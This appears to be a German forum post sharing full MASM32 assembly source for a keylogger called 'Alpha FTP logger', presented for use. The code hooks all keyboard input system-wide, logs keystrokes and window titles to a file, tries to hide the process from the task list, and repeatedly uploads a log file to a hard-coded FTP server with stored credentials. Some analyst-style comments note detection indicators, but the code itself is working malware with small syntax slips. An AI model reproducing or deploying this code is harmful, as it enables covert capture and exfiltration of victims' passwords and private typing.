Hier ein simpler Keylogger mit FTP-Upload von DaRkReD aus OpenSc.ws, sehr kleine Filesize.
;Alpha FTP logger
;By DaRkReD
;Released on 3/31/2011
.486
.model flat, stdcall
option casemap :none
include C:\masm32\include\windows.inc
include C:\masm32\include\kernel32.inc
include C:\masm32\include\user32.inc
include C:\masm32\include\wininet.inc
includelib C:\masm32\lib\kernel32.lib
includelib C:\masm32\lib\user32.lib
includelib C:\masm32\lib\wininet.lib
JournalLogHook PROTO :DWORD, :DWORD, :DWORD
NAME_BUFF_SIZE = MAX_COMPUTERNAME_LENGTH + 1
.data
; --- Configuration and state. Every string below is baked into the binary,
; --- so the host, credentials and file names are the static artifacts an
; --- analyst can pivot on when this sample turns up.
appName DB ‚Caller‘, 0                ; user agent handed to InternetOpen
FTPAddress DB ‚192.168.1.66‘, 0       ; exfil host (hard-coded private-range address)
Username DB ’nobody‘, 0               ; FTP credentials stored in the clear
Password DB,’redacted‘ 0
localFile DB ‚key.txt‘, 0             ; file the upload thread sends, relative to the process CWD
remoteFile DB ‚test3.txt‘, 0          ; name on the FTP server
hInternet HANDLE ?
hConnect HANDLE ?
bracket1 db "<"                       ; delimiters written around named (non-printable) keys
bracket2 db ">"
linefeed db 13,10,13,10,"[> %s <]",13,10,0; wsprintf format for the active-window header; its first 2 bytes double as CRLF
isLogging dd 1                        ; main loop runs while this is 1; nothing in this listing clears it
vKey dd 0                             ; virtual-key code of the current WM_KEYDOWN
nScan dd 0                            ; scan code shifted into bits 16..23 (lParam layout for GetKeyNameText)
dwCount dd 0                          ; length returned by GetKeyNameText
schar db 2 dup (0)                    ; ToAsciiEx output
kernel_name db "kernel32.dll", 0
kernel_function db "RegisterServiceProcess", 0   ; Win9x-only export resolved at runtime in start
nSize dd NAME_BUFF_SIZE
keyvalz db "Key.txt"                  ; suffix appended to the random log-file name
logfilecon db 14 dup(?)
logfileN db "Keyz.txt", 16 dup(0)
zlogfilecon db 14 dup(?)              ; sBuf + keyvalz
alogfilecon db 255 dup(?)             ; drive + zlogfilecon: the path the hook appends keystrokes to
drive db "C:\",0
random_seed dd ?                      ; LCG state used by Random / Randomize
res dd 0
sFmt db ‚C:\%u‘,0                     ; format for the random log-file name
sBuf db 10 dup(0)
.data?
ThreadID DWORD ?
logfile db 261 dup (?)
hinstance HINSTANCE ?
aMsg MSG <?>
LogHook dd ?                          ; HHOOK returned by SetWindowsHookEx(WH_JOURNALRECORD)
svBuffer dword ?                      ; receives the GetKeyNameText output
WinDir db 35 dup(?)
MyPath db 256 dup(?)
kBuffer db 256 dup (?)                ; reused for the window title and for the keyboard state
kFwin db 256 dup (?)
kGkl db 256 dup (?)
wBuffer db 512 dup (?)                ; formatted window-title header
chcount dd ?
dwBytes dd ?
aFocus dd ?                           ; current active window
lFocus dd ?                           ; last active window whose title was logged
lastvKey dd ?                         ; previous virtual-key code
NameBuffer db NAME_BUFF_SIZE dup(?)
.code
;-----------------------------------------------------------------------
; ThreadProc — exfiltration thread started from `start` via CreateThread.
; Endless loop: open a WinINet session, connect to FTPAddress on the
; default FTP port in passive mode with the hard-coded Username/Password,
; upload localFile as remoteFile in binary mode, close both handles,
; sleep 300 ms, repeat. The procedure never returns.
; Detection relevance: a process re-opening FTP sessions to one fixed
; host roughly every 300 ms.
;-----------------------------------------------------------------------
ThreadProc proc
;—-FTP UPLOAD—-
FTP:
Invoke InternetOpen, Addr appName, INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0
Mov hInternet, Eax
Invoke InternetConnect, hInternet, Addr FTPAddress, INTERNET_DEFAULT_FTP_PORT, Addr Username, Addr Password, INTERNET_SERVICE_FTP, INTERNET_FLAG_PASSIVE, 0
Mov hConnect, Eax
Invoke FtpPutFile, hConnect, Addr localFile, Addr remoteFile, FTP_TRANSFER_TYPE_BINARY, 0
Invoke InternetCloseHandle, hConnect
Invoke InternetCloseHandle, hInternet
Invoke Sleep,300                      ; 300 ms between upload attempts
jmp FTP                               ; unconditional: the loop never exits
ThreadProc endp
;-----------------------------------------------------------------------
; JournalLogHook — WH_JOURNALRECORD hook procedure installed by `start`.
; In:  code, wParam, lParam = EVENTMSG* (journal-record hook contract)
; Out: eax = result of CallNextHookEx
; code < 0: the event is passed on untouched.
; code == HC_ACTION with message == WM_KEYDOWN: appends to the file at
; alogfilecon
;   - a "[> <window title> <]" header whenever the active window changed,
;   - the translated character (ToAsciiEx) for single-character keys,
;   - "<name>" for multi-character key names, plus CRLF after Return.
; The log file is opened and closed once per keystroke.
;-----------------------------------------------------------------------
JournalLogHook proc uses edi code:DWORD, wParam:WPARAM, lParam:LPARAM
LOCAL filehandle:dword                ; log file handle for this event
.if code < 0
invoke CallNextHookEx, LogHook, code, wParam, lParam
ret
.endif
.if code == HC_ACTION
mov edi, lParam
assume edi:ptr EVENTMSG
.if [edi].message == WM_KEYDOWN
mov eax, [edi].paramL
mov ah, 0                             ; clear bits 8..15: keep the virtual-key byte
mov vKey, eax
mov eax, [edi].paramL
mov al, 0
shl eax, 8                            ; scan-code byte into bits 16..23 (lParam layout)
mov nScan, eax
invoke CreateFile, addr alogfilecon,GENERIC_WRITE,FILE_SHARE_READ,NULL,OPEN_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL
mov filehandle, eax
invoke SetFilePointer, filehandle,NULL, NULL, FILE_END   ; append
invoke GetKeyNameText, nScan,addr svBuffer, 256          ; human-readable key name -> svBuffer
mov dwCount, eax
invoke GetActiveWindow
mov aFocus, eax
.if eax != lFocus                     ; focus changed since the last keystroke: log a title header
mov lFocus, eax
invoke GetWindowText, aFocus, addr kBuffer, 256
mov chcount, eax
.if chcount > 0
invoke wsprintf, addr wBuffer, addr linefeed, addr kBuffer
invoke lstrlen, addr wBuffer
mov chcount, eax
invoke WriteFile, filehandle, addr wBuffer, chcount, addr dwBytes, NULL
.endif
.endif
.if dwCount > 0
; space, CapsLock and Shift are forced onto the single-character path
.if vKey == VK_SPACE
mov svBuffer, 32
mov svBuffer + 1, 0
mov dwCount, 1
.endif
.if vKey == VK_CAPITAL
mov svBuffer,0
mov dwCount,1
.endif
.if vKey == VK_SHIFT
mov svBuffer,0
mov dwCount,1
.endif
.if dwCount == 1
.if lastvKey != 186                   ; 186 = VK_OEM_1; after it the raw vKey byte is written instead
invoke GetKeyboardState, addr kBuffer
invoke GetForegroundWindow
invoke GetWindowThreadProcessId,eax,0
invoke GetKeyboardLayout ,eax;        layout of the foreground window's thread
invoke ToAsciiEx, vKey, nScan, addr kBuffer, addr schar, 0 ,eax   ; translate with current key state
mov chcount, eax
.else
mov chcount, 1
mov eax, vKey
mov schar, al
.endif
.if chcount > 0
invoke WriteFile, filehandle, addr schar, chcount, addr dwBytes, NULL
.endif
.else
; named (multi-character) key: write "<name>", CRLF after Return
invoke WriteFile, filehandle, addr bracket1, 1, addr dwBytes, NULL
invoke WriteFile, filehandle, addr svBuffer, dwCount, addr dwBytes, NULL
invoke WriteFile, filehandle, addr bracket2, 1, addr dwBytes, NULL
.if vKey == VK_RETURN
invoke WriteFile, filehandle, addr linefeed, 2, addr dwBytes, NULL
.endif
.endif
mov eax, vKey
mov lastvKey, eax
.endif
invoke CloseHandle, filehandle
.endif
.endif
invoke CallNextHookEx, LogHook, code, wParam, lParam
ret
JournalLogHook endp
;-----------------------------------------------------------------------
; str_cat(strBase, strAdd) — append the NUL-terminated string at strAdd
; to the end of the NUL-terminated string at strBase (terminator copied).
; Scans strBase for its NUL with repne scasb, then copies strAdd byte by
; byte. Uses eax, ecx, esi and edi as scratch.
;-----------------------------------------------------------------------
str_cat proc strBase:DWORD, strAdd:DWORD
mov edi, strBase
mov al, 0
repne scasb                           ; advance edi past the terminating NUL
dec edi                               ; back onto the NUL so it is overwritten
mov esi, strAdd
@@:
mov al, [esi]                         ; copy loop, terminator included
mov [edi], al
inc esi
inc edi
test al, al
jnz @B
ret
str_cat endp
;-----------------------------------------------------------------------
; Random(dwBase) — step the LCG in random_seed
; (seed = seed * 08088405h + 1) and return eax = high dword of
; dwBase * seed, i.e. a value in [0, dwBase). Preserves ebx.
;-----------------------------------------------------------------------
Random proc dwBase:dword
push ebx
mov eax,dwBase
xor ebx,ebx
imul edx,random_seed,08088405h        ; edx = seed * multiplier (low 32 bits)
inc edx                               ; ... + 1
mov random_seed,edx                   ; store the new seed
mul edx                               ; edx:eax = dwBase * seed
mov eax,edx                           ; keep the high half: floor(dwBase * seed / 2^32)
pop ebx
ret
Random endp
; Randomize — seed the LCG from GetTickCount (milliseconds since boot).
Randomize proc
invoke GetTickCount
mov random_seed,eax                   ; seed = uptime in ms
ret
Randomize endp
;-----------------------------------------------------------------------
; start — entry point.
; 1. Builds the log-file name: Random(9000) formatted with sFmt ("C:\%u"),
;    keyvalz appended, the result prefixed with drive into alogfilecon.
; 2. Resolves kernel32!RegisterServiceProcess at runtime and calls it
;    with (0, 1) if present — the Win9x "hide from task list" trick.
; 3. Installs a WH_JOURNALRECORD hook on JournalLogHook, starts
;    ThreadProc (FTP upload), then loops on WaitMessage/GetMessage,
;    re-installing the hook on every iteration while isLogging == 1.
; Detection relevance: WH_JOURNALRECORD installation combined with a
; background WinINet FTP client in the same process.
;-----------------------------------------------------------------------
start:
invoke Randomize
invoke Random,9000                    ; eax in [0, 9000)
mov res,EAX
invoke wsprintf,ADDR sBuf,ADDR sFmt,res   ; sBuf = "C:\<n>"
invoke lstrcpy,ADDR zlogfilecon,ADDR sBuf
invoke str_cat,ADDR zlogfilecon,ADDR keyvalz   ; zlogfilecon = sBuf + keyvalz
invoke lstrcpy,ADDR alogfilecon,ADDR drive
invoke lstrcat,ADDR alogfilecon,ADDR zlogfilecon   ; alogfilecon = drive + zlogfilecon (the hook's log path)
;try to hide only 9x
invoke GetModuleHandle, ADDR kernel_name
invoke GetProcAddress, eax, ADDR kernel_function   ; only exported by Win9x kernel32
.if eax != NULL
push 1                                ; dwType = 1
push 0                                ; dwProcessId = 0 (calling process)
call eax
.endif
invoke GetModuleHandle, NULL
;–
mov hinstance, eax
invoke SetWindowsHookEx, WH_JOURNALRECORD,addr JournalLogHook,hinstance, NULL   ; system-wide journal hook
mov LogHook, eax
mov eax,OFFSET ThreadProc
invoke CreateThread,NULL,NULL,eax,NULL,0,ADDR ThreadID   ; start the FTP upload loop
.while isLogging == 1
invoke WaitMessage
invoke GetMessage, addr aMsg, NULL, 0, 0
invoke SetKeyboardState, addr kBuffe
invoke SetWindowsHookEx, WH_JOURNALRECORD,addr JournalLogHook,hinstance, NULL   ; hook re-installed each iteration
mov LogHook, eax
.endw
invoke UnhookWindowsHookEx,addr LogHook
invoke ExitProcess, 0
end start